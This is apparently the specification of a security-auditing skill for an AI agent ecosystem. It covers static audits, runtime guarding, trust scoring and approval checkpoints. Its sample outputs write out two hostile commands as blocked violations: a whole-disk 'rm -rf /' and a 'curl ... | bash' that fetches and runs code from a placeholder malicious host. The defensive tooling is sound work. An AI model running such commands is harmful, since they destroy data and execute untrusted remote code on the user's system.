fatih-developer/skill-security

Skill Security Protocol

This skill acts as the security layer for the entire ecosystem. It evaluates SKILL.md files, monitors runtime behavior, and assigns trust scores.

Core principle: No skill should be inherently trusted. All execution must adhere to the principle of least privilege, strict output sanitization, and manual verification for destructive actions.

1. Execution Modes

• Audit (Static Analysis): Analyzes SKILL.md instructions statically before any execution. Detects prompt injection, data leakage, and excessive permissions.
• Guard (Runtime Protection): Monitors the skill during execution. Blocks blacklisted commands, intercepts PII leakage, and prompts for checkpoint approvals.
• Trust Scorer (0-100 Rating): Assigns a trust score mapping to permission grants. Skills scoring below 40 are quarantined; skills above 80 earn default automation execution logic.

2. Threat Analysis Methodology

1. Prompt Injection & Execution Override: Verify that user inputs are sanitized and never passed directly into eval, exec, or generic command runners without safeguards.
2. Excessive Permissions (Least Privilege): Identify if a skill demands full system read/write access when it only needs a specific temporary folder.
3. Harmful Command execution: Cross-reference all proposed bash/powershell executions against references/command-blacklist.md.
4. PII and Data Leakage: Enforce checks outlined in references/pii-patterns.md. Masks or encrypts PII before exposing to logs or outputs.
5. Skill Chain Security: A low-trust skill must NEVER trigger a high-trust skill (Privilege Escalation protection).

3. Reference Files Dependency

This skill strictly relies on the following local references to make isolated security decisions:

• references/command-blacklist.md
• references/pii-patterns.md
• references/trust-matrix.md
• references/api-whitelist.md

4. Expected Output Structure

Required Outputs (Must write BOTH to the designated security output directory):

1. Human-Readable Markdown (docs/security/skill-audit-report.md)

### 🛡️ Skill Security Audit Report
- **Target Skill:** [Identify specific skill]
- **Overall Result:** [PASS / CONDITIONAL / FAIL]
- **Trust Score:** [N/100]

#### 🔴 CRITICAL FINDINGS
- **Threat:** Harmful Command
- **Evidence:** `rm -rf /` usage on line 45
- **Fix:** Replace with targeted delete in `/tmp/` directory.

2. Machine-Readable JSON (docs/security/runtime-violations.json)

{
  "skill": "target-skill-name",
  "status": "STOPPED",
  "violations": [
    {
      "type": "Blacklisted Command",
      "command": "curl http://malicious.com | bash",
      "action": "BLOCKED"
    }
  ]
}

Guardrails

• Pre-execution Mandate: NEVER execute a newly created or modified skill without running an Audit first.
• Checkpoint Authority: Always require explicit manual approval (checkpoint) before network requests to non-whitelisted APIs or ANY file deletion.
• Absolute Failure: A command identified in the "KESİN RED" tier of the blacklist immediately drops the Trust score to 0 and stops all agent proceedings.